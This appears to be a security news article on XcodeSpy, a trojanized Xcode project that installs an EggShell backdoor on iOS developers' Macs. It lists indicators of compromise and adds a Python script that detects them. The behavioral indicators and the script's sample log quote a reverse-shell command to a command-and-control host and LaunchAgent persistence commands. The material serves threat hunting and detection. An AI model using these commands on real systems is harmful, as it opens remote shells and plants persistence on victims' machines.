HEAD OF MARKETING COMMUNICATIONS & PR

According to research published by SentinelOne, hackers are now targeting iOS developers with an EggShell backdoor that has worked its way into a shared Xcode project.

The company was alerted by an anonymous researcher that malicious code had been planted in a shared development project for Xcode, Apple’s integrated development environment (IDE) used to develop software for macOS, iOS, iPadOS, watchOS, and tvOS.

We recently became aware of a trojanized Xcode project in the wild targeting iOS developers thanks to a tip from an anonymous researcher. The malicious project is a doctored version of a legitimate, open-source project available on GitHub. The project offers iOS developers several advanced features for animating the iOS Tab Bar based on user interaction.

Source

The malicious Xcode project, dubbed XcodeSpy, installs a custom variant of the EggShell backdoor on the developer’s macOS computer. The backdoor can record from the victim’s microphone and camera, log keystrokes, and upload and download files.

As SentinelOne researchers point out, the fact that malicious code is being delivered through a shared Xcode project raises the question of whether the attackers are targeting developers in order to carry out a supply chain attack.

Supply chain attacks have concerned developers for a long time, and that concern has grown in recent months as the federal government and private sector work to respond to the SolarWinds incident, in which suspected Russian actors are believed to have conducted a widespread espionage operation through a malicious software update. This attack has shown that no institution is too big to be breached and no organization is completely safe from ransomware.

Source

There are two known variants of EggShell:

#1. Custom backdoors which contain a number of encrypted C2 URLs

#2. Encrypted strings for various file paths

One encrypted string in particular is shared between the doctored Xcode project and the custom backdoors, connecting them as part of the same ‘XcodeSpy’ campaign, the researchers said.
Both samples were uploaded to the malware sharing repository VirusTotal in August and October 2020.

The later sample was also found in the wild in late 2020 on a victim’s Mac in the United States. For reasons of confidentiality, we are unable to provide further details about the ITW incident. However, the victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities.

Source

Although the true motive behind these attacks is not yet known, the technique the hackers used to plant the EggShell backdoor in the Xcode project could be applied in other cases as well.

To help threat hunters and developers detect and avoid such attacks, SentinelOne researchers provided a list of known indicators of compromise:

URLs & Resolving IPs

www[.]cralev.me/

hxxps://www[.]liveupdate.cc/preview/update.php

hxxps://www[.]appmarket.co/category/search.php

hxxps://www[.]recentnews.cc/latest/details.php

hxxps://www[.]truckrental.cc/order/search.php

hxxps://www[.]everestnote.com/sheet/list.php

hxxps://www[.]alinbox.co/product/product_detail.php

hxxps://www[.]suppro.co/category/search.php


193.34.167.111

193.34.167.205


EggShell bins: */.update

SHA 256: 6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b

SHA 1: 556a2174398890e3d628aec0163a42a7b7fb8ffd

SHA 256: cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134

SHA 1: 0ae9d61185f793c6d53e560e91265583675abeb6


Xcode proj: TabBarInteraction.zip

SHA 256: 1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2

SHA 1: d65334d6c829955947f0ceb2258581c59cfd7dab


Encoded Filepaths

~/Library/Application Scripts/com.apple.TextEdit/.stors

~/Library/Application Scripts/com.apple.Preview/.stors

~/Library/Application Scripts/com.apple.usernoted/.wfy1607

~/Library/Application Scripts/com.apple.TextEdit/.scriptdb

~/Library/Application Support/com.apple.AppStore/.update

~/Library/Application Support/com.apple.usernoted/.wfy1607

~/Library/LaunchAgents/com.apple.usagestatistics.plist

~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist

/private/tmp/.osacache

/private/tmp/.osacache2

/private/tmp/.update

/tmp/.avatmp

/private/tmp/.wt0217.lck

/private/tmp/.tag


Behavioral Indicators

killall %@;sleep 3;cp "%@" "%@";chmod +x "%@";"%@" %@ 1>/dev/null 2>/dev/null

if (! pgrep -x %@ >/dev/null);then cp "%@" "%@";chmod +x "%@";"%@";fi;

sleep 1;launchctl unload "%@" > /dev/null;launchctl load "%@" > /dev/null

launchctl unload "%@" 2>/dev/null; rm "%@"

echo mdbcmd > /private/tmp/.tag;bash&> /dev/tcp/www.cralev.me/443 0>&1 &
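The indicators above can be checked on a macOS host with a short script. The following is an added example written for this page, not SentinelOne's tooling or code from the original report: it looks for the listed file paths and LaunchAgents under a given home directory and filesystem root, compares SHA-256 digests of candidate files against the listed sample hashes, and runs regular expressions derived from the behavioral indicators (with the `%@` placeholders matched loosely) over process-execution log lines. The sample log lines, their format, and the rule names are constructed for the example and are not real telemetry.

```python
# Host-side IoC check for the XcodeSpy indicators listed above.
# Added example for this page; not SentinelOne's tooling.
import hashlib
import re
from pathlib import Path
from typing import Iterable

# Network indicators from the list above, with "hxxps://" and "[.]" defanging removed.
IOC_DOMAINS = {
    "www.cralev.me", "www.liveupdate.cc", "www.appmarket.co", "www.recentnews.cc",
    "www.truckrental.cc", "www.everestnote.com", "www.alinbox.co", "www.suppro.co",
}
IOC_IPS = {"193.34.167.111", "193.34.167.205"}

# SHA-256 digests of the two EggShell binaries and the TabBarInteraction.zip project.
IOC_SHA256 = {
    "6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b",
    "cdad080d2caa5ca75b658ad102987338b15c7430c6f51792304ef06281a7e134",
    "1cfa154d0145c1fe059ffe61e7b295c16bbc0e0b0e707e7ad0b5f76c7d6b66d2",
}

# Encoded file paths: entries that start with "~/" on the page are kept relative to the
# home directory being scanned; absolute ones are joined onto the filesystem root.
IOC_HOME_PATHS = [
    "Library/Application Scripts/com.apple.TextEdit/.stors",
    "Library/Application Scripts/com.apple.Preview/.stors",
    "Library/Application Scripts/com.apple.usernoted/.wfy1607",
    "Library/Application Scripts/com.apple.TextEdit/.scriptdb",
    "Library/Application Support/com.apple.AppStore/.update",
    "Library/Application Support/com.apple.usernoted/.wfy1607",
    "Library/LaunchAgents/com.apple.usagestatistics.plist",
    "Library/LaunchAgents/com.apple.appstore.checkupdate.plist",
]
IOC_ABS_PATHS = [
    "/private/tmp/.osacache", "/private/tmp/.osacache2", "/private/tmp/.update",
    "/tmp/.avatmp", "/private/tmp/.wt0217.lck", "/private/tmp/.tag",
]

# Regexes derived from the behavioral indicators. The %@ placeholders of the original
# format strings are matched with \S+ so the rules fire on real, filled-in commands.
# Rule names are our own labels (constructed for this example).
BEHAVIOUR_RULES = {
    "launchagent_reload": re.compile(
        r"launchctl\s+(?:un)?load\s+\S*com\.apple\.(?:usagestatistics|appstore\.checkupdate)\.plist"),
    "tag_file_then_dev_tcp_shell": re.compile(
        r"echo\s+mdbcmd\s*>\s*/private/tmp/\.tag\s*;\s*bash\s*&>\s*/dev/tcp/"),
    "kill_copy_chmod_exec": re.compile(
        r"killall\s+\S+;sleep\s+\d+;cp\s+\S+\s+\S+;chmod\s+\+x"),
    "pgrep_guarded_install": re.compile(
        r"pgrep\s+-x\s+\S+\s*>/dev/null\s*\);\s*then\s+cp\s"),
}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_paths(home: Path, root: Path = Path("/")) -> list[str]:
    """Return every IoC path that exists under `home` (~/... entries) or `root` (absolute ones)."""
    candidates = [home / rel for rel in IOC_HOME_PATHS]
    candidates += [root / ab.lstrip("/") for ab in IOC_ABS_PATHS]
    return [str(p) for p in candidates if p.exists()]


def scan_hashes(files: Iterable[Path]) -> list[tuple[str, str]]:
    """Return (path, sha256) for each regular file whose digest matches a listed sample."""
    hits = []
    for p in files:
        if p.is_file():
            digest = sha256_of(p)
            if digest in IOC_SHA256:
                hits.append((str(p), digest))
    return hits


def match_behaviour(log_lines: Iterable[str]) -> list[tuple[str, str]]:
    """Return (rule_name, line) for each line matching a behavioral rule or a known C2 host."""
    hits = []
    for line in log_lines:
        for name, rx in BEHAVIOUR_RULES.items():
            if rx.search(line):
                hits.append((name, line))
        if any(d in line for d in IOC_DOMAINS) or any(ip in line for ip in IOC_IPS):
            hits.append(("known_c2_host", line))
    return hits


# Constructed sample process-execution log lines (not real telemetry); the third line is
# a benign LaunchAgent load that must not match.
SAMPLE_LOG = [
    'uid=501 proc=sh cmd="sleep 1;launchctl unload ~/Library/LaunchAgents/com.apple.usagestatistics.plist > /dev/null;launchctl load ~/Library/LaunchAgents/com.apple.usagestatistics.plist > /dev/null"',
    'uid=501 proc=bash cmd="echo mdbcmd > /private/tmp/.tag;bash &> /dev/tcp/www.cralev.me/443 0>&1 &"',
    'uid=501 proc=sh cmd="launchctl load ~/Library/LaunchAgents/com.example.devtool.plist"',
]

if __name__ == "__main__":
    home = Path.home()
    for p in scan_paths(home):
        print("IoC path present:", p)
    # "EggShell bins: */.update" from the list above: hash any hidden .update under Application Support.
    for p, d in scan_hashes(home.glob("Library/Application Support/*/.update")):
        print("IoC hash match:", p, d)
    for name, line in match_behaviour(SAMPLE_LOG):
        print(f"[{name}] {line}")
```

Run it as the affected user so `Path.home()` resolves to the right home directory; when scanning a mounted disk image instead, pass the image's root and the user's home directory from that image to `scan_paths`. Only the SHA-256 values are used for hash matching; the SHA-1 values on the page are redundant for that purpose. Domain and IP matching is a plain substring check, so feed it lines that carry the destination host (DNS or proxy logs) rather than only command lines.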
